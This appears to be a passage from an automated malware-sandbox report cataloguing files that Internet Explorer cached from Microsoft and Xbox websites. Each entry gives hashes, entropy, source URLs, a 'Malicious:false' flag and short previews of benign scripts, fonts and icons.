                                                                                                                                                                                                              Preview: var __extends;require(["htmlExtensions","componentFactory","actionToggle"],function(n,t,i){var f=n.selectElements(".cui-drawer-toggle > button").concat(n.selectElements("button.cui-drawer-toggle")),e=n.selectElements(".c-drawer > button").concat(n.selectElements("button.c-drawer")),r=function(n,t){for(var o,r,e,u,i=0,f=n;i<f.length;i++)o=f[i],o.setAttribute("aria-expanded",!1);for(r=0,e=t;r<e.length;r++)u=e[r],u.setAttribute("aria-hidden",!0),u.setAttribute("style","height:0px;overflow:hidden;"),u.setAttribute("hidden","")},u=function(n,t){for(var o,r,e,u,i=0,f=n;i<f.length;i++)o=f[i],o.setAttribute("aria-expanded",!0);for(r=0,e=t;r<e.length;r++)u=e[r],u.setAttribute("aria-hidden",!1),u.setAttribute("style","height:auto;overflow:visible;"),u.removeAttribute("hidden")};t.ComponentFactory&&t.ComponentFactory.create&&(t.ComponentFactory.create([{component:i.ActionToggle,elements:f,callback:function(t){var e,i,f,o;if(t&&t.length>0)for(e=function(t){t.subscribe({onActionToggled:function(i){
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\f5-7e27a5[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):406597
                                                                                                                                                                                                              Entropy (8bit):5.302120341827231
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:uZ3vc3UfwtwmyU4srxCqFOp03Mw1+/cg3poEjOJ2MVuGWr:uZ3vc3Wawmxxn917ur
                                                                                                                                                                                                              MD5:4162AED1F86419983FF8B4645A2B7A80
                                                                                                                                                                                                              SHA1:E9FC46D8A9DAA5704E257FAD0736A636CE9D5903
                                                                                                                                                                                                              SHA-256:186D19D033F4A71819C06A5A716D8A251EEAD9DC74C6B203E10D9ACC0C6A8500
                                                                                                                                                                                                              SHA-512:798FAD526EC8F02A55A2F42D4C1C63C729CA73C6F3AEE5DB8486CCD2745D7D35C77BA5FAAC25188E2FC871F92639D8C6E15CCCEE572E3895B39817EC5AA0B03E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/microsoft-365/_scrf/js/themes=default/54-a2dfe7/6a-ea64e0/86-39caa6/78-332b0a/a3-77e78d/36-3bbfcb/34-a35c67/9e-6ade99/b4-ce5167/2b-b6ab60/7e-a075ed/9d-bc041d/28-8f59e1/1e-b84759/58-f3fc85/c4-301a8f/19-9c8e36/66-afd0b6/a0-1d81d4/f5-7e27a5?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: define("Buybox",["dialog","componentFactory","officeUtilities"],function(n,t,i){"use strict";function o(n){var t=n.querySelector(r.dialogContentSelector);t&&(t.innerHTML="")}function s(n){var t=i.getSiblings(n),r;if(t&&t.length)for(r=0;r<t.length;r++)t[r].setAttribute("data-js-controlledby","dialog")}function h(n,t){var u,i,e;if(n.preventDefault(),s(t),f=n.currentTarget,u=n.currentTarget.parentElement,u&&t.mwfInstances&&t.mwfInstances.Dialog&&(i=u.nextElementSibling,i&&i.classList.contains("popup"))){var o=t.mwfInstances.Dialog,c=t.querySelector(r.dialogContentSelector),h=i.cloneNode(!0);h.classList.remove("x-hidden");e=document.createDocumentFragment();e.appendChild(h);c.appendChild(e);o.update();o.show()}}function c(){var h=getComputedStyle(document.body).backgroundColor==="rgb(0, 0, 0)",s;if(u=document.querySelectorAll(r.comparisonTableModuleSelector),e=document.querySelectorAll(r.dialogSelector),t.ComponentFactory.create([{c:n.Dialog,elements:e,callback:function(n){n&&n.length&&Arr
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\favicon[2].ico
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:MS Windows icon resource - 1 icon, 15x16, 32 bits/pixel
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1086
                                                                                                                                                                                                              Entropy (8bit):3.026330971330648
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:+fXLUAe3e+3ykqqDmNiqYn1fS7ieRwUUp8VPY+J+g3gCew5ezqeOP1gUf:m7UAUgi/lS7iod9HhwCJ5RNT
                                                                                                                                                                                                              MD5:7C562B1C2B03EAC761285DA62285E7C3
                                                                                                                                                                                                              SHA1:415308A176F7255E10C7197EEBE7829EB23ED530
                                                                                                                                                                                                              SHA-256:B9C8190C3726081598B6AFD64AB6C4E53C1EC273774A3E71CCA2DBE897D9EC67
                                                                                                                                                                                                              SHA-512:E35C991640621384DCB99A7729B9B7F2ADD5589F51D809DBE9643DE06E5C46053618E0CEA054539273D183BFA9D81AD5D607615D5AB7371390E0F21497646130
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.xbox.com/xbcservicewebwww-2104-29112-0-0-main-rolling/shell/images/favicon.ico
                                                                                                                                                                                                              Preview: ............ .(.......(....... ..... ..............................{...{...{...{.g.{...{...{...{...{...{.g.{...{...{.......{...{...{.'.{...{...{...{...{...{...{...{...{...{.'.{...{...{...{...{...{...{...{...{...{...{...{...{...{...{...{...{...{...{.0.{.t.{...{...{...{...{...{...{...{...{...{.t.{.0.{...{.Y.{...{.!.{...{...{...{...{...{...{...{...{...{.!.{...{.Y.{...{...{...{.Y.{...{...{...{...{...{...{...{.Y.{...{...{...{...{...{.Z.{...{...{...{...{...{...{...{...{...{.Z.{...{...{...{...{...{...{...{...{...{...{...{...{...{...{...{...{...{...{...{...{.g.{...{...{...{...{...{...{...{.g.{...{...{...{...{...{...{...{.(.{...{...{.Z.{...{...{.(.{...{...{...{...{...{...{...{...{...{...{.......{...{...{...{...{...{...{...{.T.{...{...{...{...{.A.{.......{...{.A.{...{...{...{...{.T.{...{...{...{...{...{...{.......{...{...{...{...{...{...{...{...{.&.{...{.Z.{...{...{...{.?.{...{...{...{.Z.{...{.&.{...{...{...{...{...{.<.{.v.{...{...{...{.v.{.<.{...{...{...{...........{...{...{.].{...{...{...{...{
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\icons[1].eot
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Embedded OpenType (EOT), icons family
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4388
                                                                                                                                                                                                              Entropy (8bit):5.568378803379191
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:2WZx42qACoApC6do8MPOGiN4mER38GTDfO/fv:1x42qAHAo6VMPi6mcTy
                                                                                                                                                                                                              MD5:77E1987DF3A0274C5A51E3C55CEE7C98
                                                                                                                                                                                                              SHA1:9B0FE96AF141AB09183F386F65BC627B8C396460
                                                                                                                                                                                                              SHA-256:EF04649D4D068673CF0FA47EF4C45C8BE291E703F4EC5FC0E507F17839120AA2
                                                                                                                                                                                                              SHA-512:B1E0CFB515FF2298799BA54574899D27B1FC043F66CC4E9591C504F88273B98697B99ED25955DB84986B39ED9F51864611833DC88064B14C29ADC020FBF6E295
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.onestore.ms/cdnfiles/external/oneui/oneui1.16.2/dist/fonts/icons/icons.eot?
                                                                                                                                                                                                              Preview: $.................................LP...........................G....................i.c.o.n.s.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .1...0.....i.c.o.n.s................ OS/2@.Mn...(...Vcmap.1.........Jglyf..........dhead.9.........6hhea.$.........$hmtx@...........loca". h...L...Bmaxp.3.`....... name............post{NK............................................ ........G..._.<............|.......|......................... .T...................................D.l...H.D.l....................................PfEd.@...........................................................................................................................................................................D...........(............................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\info_48[1]
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4113
                                                                                                                                                                                                              Entropy (8bit):7.9370830126943375
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                                                              MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                                                              SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                                                              SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                                                              SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\intagram[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1933
                                                                                                                                                                                                              Entropy (8bit):4.814153196245164
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cMAvf36kdK2RzRJ6Ic8MYDtGsMAuikQNfh8n7BPNw2+U:WvfKB2RzRYB8MwtGsLuj4fh8162+U
                                                                                                                                                                                                              MD5:E35214ECC20626096D581CC01007983B
                                                                                                                                                                                                              SHA1:D29C051EB2D17EAC136C3DBCAD3413FDE3BACD6D
                                                                                                                                                                                                              SHA-256:D2F037216548CF627D442B9B2838D128CAFF22C904451971659371EF7604F64A
                                                                                                                                                                                                              SHA-512:B571A5EF08BC3F434EA27AD82202FA5FA4A71F33B2C2B85DB0EE1FC19F9291CDFBA227A87DC1FB42E5BF02B955C072927E4E5DE6FAE541889FA90CC781DEC9AA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/intagram.svg?version=3571ba35-1fde-08f2-8396-dd1969712cd8
                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 25.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 150 150" style="enable-background:new 0 0 150 150;" xml:space="preserve">.<style type="text/css">...st0{fill:#FFFFFF;}...st1{fill:#232020;}.</style>.<rect x="0" class="st0" width="150" height="150"/>.<path class="st1" d="M143.1,46c-0.3-7.4-1.5-12.5-3.2-16.9c-1.8-4.7-4.5-8.9-8-12.3c-3.5-3.5-7.7-6.3-12.3-8..c-4.4-1.7-9.5-2.9-16.9-3.2C95.2,5.2,92.9,5.1,74,5.1S52.7,5.2,45.3,5.5S32.8,7,28.4,8.7c-4.7,1.8-8.9,4.5-12.3,8..c-3.5,3.5-6.3,7.7-8,12.3c-1.8,4.5-3,9.6-3.3,17c-0.4,7.4-0.4,9.8-0.4,28.7S4.5,96,4.8,103.4s1.5,12.5,3.2,16.9..c1.8,4.7,4.5,8.9,8,12.3c3.5,3.5,7.7,6.3,12.3,8c4.4,1.7,9.5,2.9,16.9,3.2s9.8,0.4,28.7,0.4s21.3-0.1,28.7-0.4..c7.4-0.3,12.5-1.5,16.9-3.2c9.4-3.6,16.7-11,20.4-20.4c1.7-4.4,2.9-9.5,3.2-16.9s0.4-9.8,0.4-
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\jquery-3.3.1.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):86929
                                                                                                                                                                                                              Entropy (8bit):5.289492706499139
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:aLiBdiaWLOczCmZx6+VWuGzQNOzdn6x2RZd9SEnk9HB96c9Yo/NWLbVj3kC6ta:+kn6x2xe9NK6nC6E
                                                                                                                                                                                                              MD5:378087A64E1394FC51F300BB9C11878C
                                                                                                                                                                                                              SHA1:0C3192B500A4FD550E483CF77A49806A5872185B
                                                                                                                                                                                                              SHA-256:4FE68FA216176E6D1F4580E924BAFECC9F519984ECC06B1A840A08B0D88C95DE
                                                                                                                                                                                                              SHA-512:9A2C70516EA0C8C37C7F072F214DE0AFD5DDEB643C6B5D3FA8ADE3EF8D2CE40BDF8B1B1194BAD296E9075562701EE7DAE48B18144B1CD2D735328BE5A3ACCBE6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/46c44584/coreui.statics/externalscripts/jquery/jquery-3.3.1.min.js
                                                                                                                                                                                                              Preview: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */..!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)}
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\latest[1].woff
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 41280, version 0.0
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):41280
                                                                                                                                                                                                              Entropy (8bit):7.99148680813376
                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                              SSDEEP:768:p6DwF7RdgMRl+TIRNdEwkoGy4q0vcZ7xaRefiwsoGuTs1txGTeG:p6DwF7PRl+TkvEYuGZdEefi6GuTo/eN
                                                                                                                                                                                                              MD5:E8EA6DC81AB52C7D6124E89EBCAC926A
                                                                                                                                                                                                              SHA1:B7BF79D3D738B06DFE9E567FEEE25D9B983135BB
                                                                                                                                                                                                              SHA-256:1EE846986FBF0BFC9F0996F563D748589A32B29AF6A6E444312C5A4DA27504C1
                                                                                                                                                                                                              SHA-512:B25A7582B9FB6A146AA927BEBC91D4F34B1820017C75DCC3DAFA8ACE22547579E3AAD82788C89C2F373330F71F970500BCDEE7C520C1A791F374A4E8DD5E3396
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.woff
                                                                                                                                                                                                              Preview: wOFF.......@.......H........................OS/2...D...Z...`J..|cmap............."<.cvt ..........."..].fpgm...........\ID.ggasp...L...........#glyf...\...O.....k.head.......6...6..T2hhea.......!...$.z.8hmtx............c!.Dloca...............Pmaxp....... ... .6.fname..............>.post........... .Q.wprep.......h...@....x.c`f.g......:....Q.B3_dHc..`e.feb.B&....e...'.(..VP`p`......@F^.ELL....Ar,.......3.9f....x.e.}L.U..?.."i.\4.5..(.....6..--.Z[[j)) ... . jR....F.VF..7....a.VTj.....[......ta..}.9;....~.~....^......I$.j.>...a...5^...'...)_..D.S.....Lqf8...g.S..r.8..3.@`H`{`_........&..~&.&.d..f..2.M.t.7.Mr{.)n?7...Nts...-.......o..0..Kw*M..j.Fk....<..5]E.PU.'...N.....O..1..ncb<c,O...d...'/.Ct..<.u.....&....!..~.].v....~..Gx7.V.w.k..{...I{9....h~.....'.Y.....H....T.7....@.]..pi87...u...Up.....f..AA.{.Y.."v^aU.uj..5......Q..is.M.ns.....6.y.Uz...F-u.......yUb%.4O..6.2.8.R6...h.:o.>.9...d....a...C|...r.....w|...*.....H!...+..<..e.%..G).Y.B.XD9..H./P...X.v.d..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\latest[2].woff
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 35900, version 0.0
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):35900
                                                                                                                                                                                                              Entropy (8bit):7.989413276112553
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:d1DM2UJJ9OKKukRdfijklR4f0Ki9NkmeWkujUkTl68TEG4sI:LD7RKKukRdfukKiDq3ITEl
                                                                                                                                                                                                              MD5:70C1D43A35B7A48D088D830EA07FCF77
                                                                                                                                                                                                              SHA1:025E0E281139C70C5538E09BFA7927141AF0CC0B
                                                                                                                                                                                                              SHA-256:942E5DD201200674506B0DF50C1AFEF021FFF6D5BD7BB7F600DED8617DBCB386
                                                                                                                                                                                                              SHA-512:E40B2CEAA1F672891BFF21F7C22A8B473DCF998FDC0A74B3DD1999190BA281C330C871D4BC82F89561E2AD7D97FE3169F33748AD368184BD1B4850941822D921
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://i.s-microsoft.com/fonts/segoe-ui/west-european/semibold/latest.woff
                                                                                                                                                                                                              Preview: wOFF.......<................................OS/2...D...W...`K..rcmap..............<.cvt .......y....c.e0fpgm...,.......5.KV.gasp................glyf......sH.......$head...0...6...6....hhea...h...!...$...Jhmtx................loca...L.........z.@maxp...H... ... .N.?name...h........!MG$post...X....... .Q.wprep...l........[...x.c`fie.``e.`..j...(.../2.1.q.2q.3..!.s...2........+(.)..X/..d..X.......ca`.......1..e.x.e.}L.U..?.."e.\4.4..(8_R.#....MM.Z[[.%*....(& .Q...:G.ZF..2..{....i^n.ee..Vx...1...=...vv>....D........:..'...t.z......k....MP...S..|-.RU.VuNog..3.)r.;+.:.C.s.........w....'h.M..e.k2M..e.C.nz...n...Mq{.i.`w....g..8......}..!..Gir5HC5B#.H..I=..U.rU.xR;..t.-....MO.j.7&.3..n.I.<.u...x......_&V..$..b3...o.....l...b...M...]..^=xv.^.7(....z...e..tT.&.1.:R..E.K....k!..UY.4......P}.:8g..m?.......JT.;.....5....T.oS...z....&t[..M.y..~x..b.&...........d..J.d..j.u.f^.8.U.V..OZ....)N..3..z...|>.4.s..|.U.h....=fq.:..+.f6..+.P...1.bJ.1.R.1.....E,.g.y.%,......eTY./.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\launch-ENbb9d0de7cc374dc99259df2c4b823cef.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):156878
                                                                                                                                                                                                              Entropy (8bit):5.1109162155791985
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:V4O4HsuM2LqfmCNM3yJwjUW+6r1GPG4xArt8SwJgGK/d:V4OZujqfmCNEyJl6r1GPG4xy8SwaD
                                                                                                                                                                                                              MD5:BC29DE1ED12AE04C1BDB39E66801156E
                                                                                                                                                                                                              SHA1:B8F3A1EB788702BB88BF68A825F46A6B8EAFC66E
                                                                                                                                                                                                              SHA-256:AFF567B6DE41AC63E742A44B1B8AF49D4E0ED595A7364C8E2F9B600C8BACF3BF
                                                                                                                                                                                                              SHA-512:0EADA39C01B189B6DC425F0CC656E4CB3879A7401DA6B4F7921CFF66D612AD11EF0E27FBB9656F713A6AE5D890A17887C0BF423796B095C0FF330893586B82B3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/launch-ENbb9d0de7cc374dc99259df2c4b823cef.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/launch-ENbb9d0de7cc374dc99259df2c4b823cef.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2021-05-12T11:29:25Z",environment:"production",turbineBuildDate:"2021-04-26T16:54:28Z",turbineVersion:"27.1.3"},dataElements:{MSCC_Consent:{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return!("undefined"!=typeof window.mscc&&"function"==typeof window.mscc.hasConsent&&!window.mscc.hasConsent())}}},"Windows - All Pages":{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return!!location.pathname.match(/\/windows\/?/gi)}}},"JSLL RedTiger":{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(){return 0<$("#primaryArea[data-m]").length}}},SiteConsent_Advertising:{defaultValue:"",modulePath:"core/src/lib/dataElements/customCode.js",settings:{so
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\linkedin-black[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1002
                                                                                                                                                                                                              Entropy (8bit):5.281632689389119
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:2dMATLf3G5kdtxD6JOLdvAGEzHTvlgvshAT:cMAvf36kdjdYvzJdAT
                                                                                                                                                                                                              MD5:6BC3F07EBDE9816526D80A92FE753F35
                                                                                                                                                                                                              SHA1:1A1E333AFD893EFBD4C57F7278D0CF58C245452F
                                                                                                                                                                                                              SHA-256:C8829281E483B259FFCCC02E74D97D7F181B29EA9CF9BB50C03E39FEE8D2CA0C
                                                                                                                                                                                                              SHA-512:817381FC3C60ED9683C699B319C955A8BEEAA6CBCBD8400D4817DF6A4CBD5DDBAA8628FA8CBD79A0540930E9F538463E242207638F5DF7AC9039E9BAFCFC9D41
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/linkedin-black.svg?version=9e943abf-c655-434c-6e60-91aed3e9ea11
                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 25.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 150 150" style="enable-background:new 0 0 150 150;" xml:space="preserve">.<style type="text/css">...st0{fill:#FFFFFF;}...st1{fill:#232020;}.</style>.<rect x="0" class="st0" width="150" height="150"/>.<path class="st1" d="M129.6,11H20.4c-5.2,0-9.5,4.1-9.5,9.2v109.7c0,5.1,4.2,9.2,9.5,9.2h109.1c5.2,0,9.5-4.1,9.5-9.2V20.2..C139,15.1,134.8,11,129.6,11z M30.7,118.1V60.5h19.2v57.6H30.7z M40.3,52.6L40.3,52.6L40.3,52.6c-6.5,0-10.7-4.4-10.7-10..c0-5.7,4.3-10,10.8-10c6.6,0,10.6,4.3,10.7,10C51.2,48.2,47,52.6,40.3,52.6z M119,118.1H99.8V87.3c0-7.7-2.8-13-9.7-13..c-5.3,0-8.4,3.6-9.8,7c-0.5,1.2-0.6,3-0.6,4.7v32.2H60.5l0,0c0,0,0.3-52.2,0-57.6h19.2v8.2c2.5-3.9,7.1-9.5,17.3-9.5..c12.6,0,22.1,8.2,22.1,25.9L119,118.1L119,118.1z"/>.</svg
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\meBoot.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):158480
                                                                                                                                                                                                              Entropy (8bit):5.5488891216864875
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:5iJTI1B9EHzBbiiPRJfD51eEGSZzADifqSASP:gJcaBbi2GPDYqSASP
                                                                                                                                                                                                              MD5:58CD0DD62DCF3A17D57F22606971D677
                                                                                                                                                                                                              SHA1:6D9901793C63C83B75825F967A8D535ECCB212D2
                                                                                                                                                                                                              SHA-256:78E28E2D8BA23140D8AC2159F0BA64E817C35D1021CE69609CA2835B2B3AC572
                                                                                                                                                                                                              SHA-512:CF3F1139A6D907E4AFF44699B098C01B03154EE313338B92011843F6173DE5B182213FFC89949EB642CC92BEFBC4AFEF756C0013220365EFAC6A1B9462569B15
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://mem.gfx.ms/scripts/me/MeControl/10.21123.2/de-DE/meBoot.min.js
                                                                                                                                                                                                              Preview: MeControlDefine("meBoot",["exports","@mecontrol/web-inline"],function(t,w){"use strict";var c=function(){},i={},u=[],p=[];function S(t,e){var r,n,o,i,a=p;for(i=arguments.length;2<i--;)u.push(arguments[i]);for(e&&null!=e.children&&(u.length||u.push(e.children),delete e.children);u.length;)if((n=u.pop())&&void 0!==n.pop)for(i=n.length;i--;)u.push(n[i]);else"boolean"==typeof n&&(n=null),(o="function"!=typeof t)&&(null==n?n="":"number"==typeof n?n=String(n):"string"!=typeof n&&(o=!1)),o&&r?a[a.length-1]+=n:a===p?a=[n]:a.push(n),r=o;var s=new c;return s.nodeName=t,s.children=a,s.attributes=null==e?void 0:e,s.key=null==e?void 0:e.key,s}function T(t,e){for(var r in e)t[r]=e[r];return t}function d(t,e){t&&("function"==typeof t?t(e):t.current=e)}var e="function"==typeof Promise?Promise.resolve().then.bind(Promise.resolve()):setTimeout;var l=/acit|ex(?:s|g|n|p|$)|rph|ows|mnc|ntw|ine[ch]|zoo|^ord/i,r=[];function a(t){!t._dirty&&(t._dirty=!0)&&1==r.push(t)&&e(n)}function n(){for(var t;t=r.pop();)t
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me[2].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10327
                                                                                                                                                                                                              Entropy (8bit):5.436316506742828
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:mAS1n+7Xr+cHEzFQD6Ds35b05e58ITZSTXh7gk0yi4BfEmKuG8:mg7XrUJds35bd8cArv
                                                                                                                                                                                                              MD5:F3D751E7A3D01CA74DAF08B12B5BCB42
                                                                                                                                                                                                              SHA1:22B8EBB77D34B49F5E966DC3D7FD85F86EF0E1EE
                                                                                                                                                                                                              SHA-256:F2F17F83399EEDB1293476621C5FA2C44477BEE065583E33D9C741068C1EBD02
                                                                                                                                                                                                              SHA-512:FC8C90CBCB2629CF3F1EB9D27C36536E7953885B040276EBF1E20987753A53492CA8FCD877660320D371D251BD36CCC2B28F2E3303EBDCC8274B365EB9072893
